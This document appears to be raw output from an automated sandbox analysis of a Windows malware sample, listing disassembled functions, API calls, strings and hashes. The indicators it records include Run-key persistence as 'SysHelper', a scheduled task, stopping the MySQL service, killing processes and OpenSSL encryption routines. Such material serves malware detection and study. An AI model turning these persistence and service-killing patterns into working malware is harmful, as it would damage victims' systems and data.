                                                                                                          • Part of subcall function 00F649A0: _wcsstr.LIBCMT ref: 00F64A8A
                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F92316
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00F92323
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00F92338
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F92341
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 00F9234E
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F9235C
                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00F9236E
                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 00F923CA
                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 00F923D6
                                                                                                        • SelectObject.GDI32(?,?), ref: 00F92436
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F9243D
                                                                                                        • DeleteDC.GDI32(?), ref: 00F9244A
                                                                                                        • DeleteDC.GDI32(?), ref: 00F92450
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                        • API String ID: 151064509-1805842116
                                                                                                        • Opcode ID: b46dec1571ea6ea4775c63049f26de263516083ef778c430e556c11e4b91db76
                                                                                                        • Instruction ID: 0d7ed1242274a76aba30caba8daeb12a13f53ab1c34ea6166f3009310c9bb19b
                                                                                                        • Opcode Fuzzy Hash: b46dec1571ea6ea4775c63049f26de263516083ef778c430e556c11e4b91db76
                                                                                                        • Instruction Fuzzy Hash: EC41D631944304ABE710AB759C4AF2FBBF9FF89710F00051AFA94D62A1D7769800DBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _strncmp
                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                        • API String ID: 909875538-2733969777
                                                                                                        • Opcode ID: 232fadda3e47253bf186cebb8e3492e4838a982f072df8b207b5ef066dc1c321
                                                                                                        • Instruction ID: 3ad1735bb235c68e2ba4925fc72fe9eb706752ac004ed8554179e8152b7979e6
                                                                                                        • Opcode Fuzzy Hash: 232fadda3e47253bf186cebb8e3492e4838a982f072df8b207b5ef066dc1c321
                                                                                                        • Instruction Fuzzy Hash: 20F1E872A08341BBE721EA24DC42F5B77D89F55714F04482AFE8CD7282E674DA09B793
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1503006713-0
                                                                                                        • Opcode ID: c1ff839586c6294d4ba86e8ea4cf07bdbbb4f7a6c2a0984b3f108c57cdc4a136
                                                                                                        • Instruction ID: e9cb9cce1623197742303412616093f997bc08bf43e6866a0c50b5bd5cd345b6
                                                                                                        • Opcode Fuzzy Hash: c1ff839586c6294d4ba86e8ea4cf07bdbbb4f7a6c2a0984b3f108c57cdc4a136
                                                                                                        • Instruction Fuzzy Hash: FD218476509A05EBEB217F65DC02E0FBBD4DFC1FB0F14442AF48496191EE699810FB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • DecodePointer.KERNEL32 ref: 00F37B29
                                                                                                        • _free.LIBCMT ref: 00F37B42
                                                                                                          • Part of subcall function 00F30BED: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3507F,00000000,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30C01
                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30C13
                                                                                                        • _free.LIBCMT ref: 00F37B55
                                                                                                        • _free.LIBCMT ref: 00F37B73
                                                                                                        • _free.LIBCMT ref: 00F37B85
                                                                                                        • _free.LIBCMT ref: 00F37B96
                                                                                                        • _free.LIBCMT ref: 00F37BA1
                                                                                                        • _free.LIBCMT ref: 00F37BC5
                                                                                                        • EncodePointer.KERNEL32(0084C698), ref: 00F37BCC
                                                                                                        • _free.LIBCMT ref: 00F37BE1
                                                                                                        • _free.LIBCMT ref: 00F37BF7
                                                                                                        • _free.LIBCMT ref: 00F37C1F
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F21BB0
                                                                                                        • CoCreateInstance.OLE32(00FDE908,00000000,00000001,00FDD568,00000000), ref: 00F21BC8
                                                                                                        • CoUninitialize.OLE32 ref: 00F21BD0
                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00F21C12
                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00F21C22
                                                                                                        • lstrcatW.KERNEL32(?,01010050), ref: 00F21C3A
                                                                                                        • lstrcatW.KERNEL32(?), ref: 00F21C44
                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00F21C68
                                                                                                        • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00F21C7A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                        • String ID: \shell32.dll
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00F64B72), ref: 00F649C7
                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F649D7
                                                                                                        • GetDesktopWindow.USER32 ref: 00F649FB
                                                                                                        • GetProcessWindowStation.USER32(?,00F64B72), ref: 00F64A01
                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00F64B72), ref: 00F64A1C
                                                                                                        • GetLastError.KERNEL32(?,00F64B72), ref: 00F64A2A
                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00F64B72), ref: 00F64A65
                                                                                                        • _wcsstr.LIBCMT ref: 00F64A8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F4,00F64C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00F6480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00F61D37,00000000,00F1CDAE,00000001,00000001), ref: 00F64AFA
                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00F64B05
                                                                                                        • __vfwprintf_p.LIBCMT ref: 00F64B27
                                                                                                          • Part of subcall function 00F3BDCC: _vfprintf_helper.LIBCMT ref: 00F3BDDF
                                                                                                        • vswprintf.LIBCMT ref: 00F64B5D
                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00F64B7E
                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00F64BA2
                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00F64BA9
                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00F64BD3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00F22389
                                                                                                        • _memset.LIBCMT ref: 00F223B6
                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 00F223DE
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F223E7
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F223F4
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00F223FF
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2240E
                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 00F22422
                                                                                                        Strings
                                                                                                        • SysHelper, xrefs: 00F223D6
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00F2237F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                        • String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F1DAEB
                                                                                                        • CoCreateInstance.OLE32(00FE4F6C,00000000,00000001,00FE4F3C,?,?,00FDA948,000000FF), ref: 00F1DB0B
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F1DBD6
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,00FDA948,000000FF), ref: 00F1DBE3
                                                                                                        • _memset.LIBCMT ref: 00F1DC38
                                                                                                        • CoUninitialize.OLE32 ref: 00F1DC92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                        • API String ID: 330603062-1376107329
                                                                                                        • Opcode ID: 91c5fbc2ae3eac383f05940961f7bc983d35a324924c7defd6dcdb18eb1a90bf
                                                                                                        • Instruction ID: 2a3d67a021bd9c038f1a102111cc0df72660fb74c6058a3e2261f8a81c2ab9b1
                                                                                                        • Opcode Fuzzy Hash: 91c5fbc2ae3eac383f05940961f7bc983d35a324924c7defd6dcdb18eb1a90bf
                                                                                                        • Instruction Fuzzy Hash: C2512370A4024AAFCB00DF94CC89FAE77B9FF88B05F108558F505AB290DBB5A945CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00F21A1D
                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00F21A32
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00F21A46
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00F21A5B
                                                                                                        • Sleep.KERNEL32(?), ref: 00F21A75
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00F21A80
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00F21A9E
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00F21AA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                        • String ID: MYSQL
                                                                                                        • API String ID: 2359367111-1651825290
                                                                                                        • Opcode ID: 9f27b672c6d181d0f8dadcacaea404517138a15070b0b70f1f7089d5189e4ea5
                                                                                                        • Instruction ID: 296adc52c1f3977133143141c60b69fc08ffe2f58aadd0bf8e7576d3914ed272
                                                                                                        • Opcode Fuzzy Hash: 9f27b672c6d181d0f8dadcacaea404517138a15070b0b70f1f7089d5189e4ea5
                                                                                                        • Instruction Fuzzy Hash: AB11A331E0221AABDB205BA4AC4DFAF7BBDEB45761F040111FA00E6140D728D945EEE4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • std::exception::exception.LIBCMT ref: 00F5F27F
                                                                                                          • Part of subcall function 00F40CFC: std::exception::_Copy_str.LIBCMT ref: 00F40D15
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F294
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,00F5F299,?,?,?,?,?,?,?,00F5F299,?,01018238,?), ref: 00F40F1F
                                                                                                        • std::exception::exception.LIBCMT ref: 00F5F2AD
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F2C2
                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 00F5F2D4
                                                                                                          • Part of subcall function 00F5EF74: std::exception::exception.LIBCMT ref: 00F5EF8E
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F2E2
                                                                                                        • std::exception::exception.LIBCMT ref: 00F5F2FB
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F310
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                        • String ID: bad function call
                                                                                                        • API String ID: 2464034642-3612616537
                                                                                                        • Opcode ID: 19c60c2fe2ccb3d86236ff627f883da013f9870a61f408537e6395f6b0b9618e
                                                                                                        • Instruction ID: 9a099d38b344b3b62c2b57f211a8aba58068a6a026cd89a340a61fa55a37eec2
                                                                                                        • Opcode Fuzzy Hash: 19c60c2fe2ccb3d86236ff627f883da013f9870a61f408537e6395f6b0b9618e
                                                                                                        • Instruction Fuzzy Hash: E211EC74D0020DBBCF00EFA5C985CDDBBBCEA04344B448566BE2497546EB78A3199B91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 00F754C8
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00F754D4
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00F754F7
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00F75503
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00F75531
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 00F7555B
                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 00F755F5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                        • Opcode ID: 45622226a1e0b92227e80248a9b9e6615fd8719d5f76040eaafb4a6869e4458d
                                                                                                        • Instruction ID: 22b2f07c215128af157ef7dd4bfa2f0f1ba972c4860f84bb43b63572117e5cb7
                                                                                                        • Opcode Fuzzy Hash: 45622226a1e0b92227e80248a9b9e6615fd8719d5f76040eaafb4a6869e4458d
                                                                                                        • Instruction Fuzzy Hash: 2C514B31E40609BBEB206B648C03FBF776AAF45B20F044167FE05AB1D1D6A59D05A6A3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00F2244F
                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F22469
                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F224A1
                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 00F224B0
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F224B7
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00F224C1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F224CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                        • String ID: cmd.exe
                                                                                                        • API String ID: 2696918072-723907552
                                                                                                        • Opcode ID: a8fbbbba391fa7b13fc375e75416df0fcbe96c0f1d4cbe7dd33310b516673ad6
                                                                                                        • Instruction ID: 74b34f0a560826bd86cc79d57ea010983a12cc4df81550bf31f7137bc438e688
                                                                                                        • Opcode Fuzzy Hash: a8fbbbba391fa7b13fc375e75416df0fcbe96c0f1d4cbe7dd33310b516673ad6
                                                                                                        • Instruction Fuzzy Hash: D401963290222A7BD720A7B1BC4DFAF776CDB04715F000152FD08D2142E66499409AE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                        • Opcode ID: 27b5574b9f50ceb892d1dba0f1708779190e604ee8648416b4634dc67b7b7286
                                                                                                        • Instruction ID: f0366f06331f9dff8882d69f5133db8001bd98740f2888ecc004903134478cd6
                                                                                                        • Opcode Fuzzy Hash: 27b5574b9f50ceb892d1dba0f1708779190e604ee8648416b4634dc67b7b7286
                                                                                                        • Instruction Fuzzy Hash: 03A142B1C00259DBEF11EFE4DC56BDEBB75AF14314F140028E40577282D7BA5A98EBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _strncmp
                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                        • API String ID: 909875538-2908105608
                                                                                                        • Opcode ID: e65d30b4e54d7de6c00591f13d43ac5195f91982d55b8f12e6dba2d4df3bb017
                                                                                                        • Instruction ID: 0de97af402abe0aec42b1a24db2f4819ed682db507e99e263b75940bc0ef9c67
                                                                                                        • Opcode Fuzzy Hash: e65d30b4e54d7de6c00591f13d43ac5195f91982d55b8f12e6dba2d4df3bb017
                                                                                                        • Instruction Fuzzy Hash: 264148A1F8835579F731A929BC03F9673815F51B21F088422FB8CE91C2F7858547B293
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __init_pointers.LIBCMT ref: 00F35141
                                                                                                          • Part of subcall function 00F37D6C: EncodePointer.KERNEL32(00000000,?,00F35146,00F33FFE,01017990,00000014), ref: 00F37D6F
                                                                                                          • Part of subcall function 00F37D6C: __initp_misc_winsig.LIBCMT ref: 00F37D8A
                                                                                                          • Part of subcall function 00F37D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F426B3
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F426C7
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F426DA
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F426ED
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F42700
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F42713
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F42726
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F42739
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F4274C
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F4275F
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F42772
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F42785
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F42798
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F427AB
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F427BE
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F427D1
                                                                                                        • __mtinitlocks.LIBCMT ref: 00F35146
                                                                                                        • __mtterm.LIBCMT ref: 00F3514F
                                                                                                          • Part of subcall function 00F351B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F35154,00F33FFE,01017990,00000014), ref: 00F38B62
                                                                                                          • Part of subcall function 00F351B7: _free.LIBCMT ref: 00F38B69
                                                                                                          • Part of subcall function 00F351B7: DeleteCriticalSection.KERNEL32(0101AC00,?,?,00F35154,00F33FFE,01017990,00000014), ref: 00F38B8B
                                                                                                        • __calloc_crt.LIBCMT ref: 00F35174
                                                                                                        • __initptd.LIBCMT ref: 00F35196
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F3519D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3567560977-0
                                                                                                        • Opcode ID: b4186c6fedaa2b3c0fef3554ba354e997b58c664b0879b02535a623dc11e98e2
                                                                                                        • Instruction ID: f679d2c69902e0ebd839cf369d566a671e782742f7fa2ab4ee7eef1b5a4114d0
                                                                                                        • Opcode Fuzzy Hash: b4186c6fedaa2b3c0fef3554ba354e997b58c664b0879b02535a623dc11e98e2
                                                                                                        • Instruction Fuzzy Hash: 40F0243394AB515DE23577B47D03B4A3AD0EF41B70F21062AF864C62D5FF2D94427190
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 00F3594A
                                                                                                          • Part of subcall function 00F38AF7: __mtinitlocknum.LIBCMT ref: 00F38B09
                                                                                                          • Part of subcall function 00F38AF7: __amsg_exit.LIBCMT ref: 00F38B15
                                                                                                          • Part of subcall function 00F38AF7: EnterCriticalSection.KERNEL32(00000000,?,00F350D7,0000000D), ref: 00F38B22
                                                                                                        • _free.LIBCMT ref: 00F35970
                                                                                                          • Part of subcall function 00F30BED: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3507F,00000000,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30C01
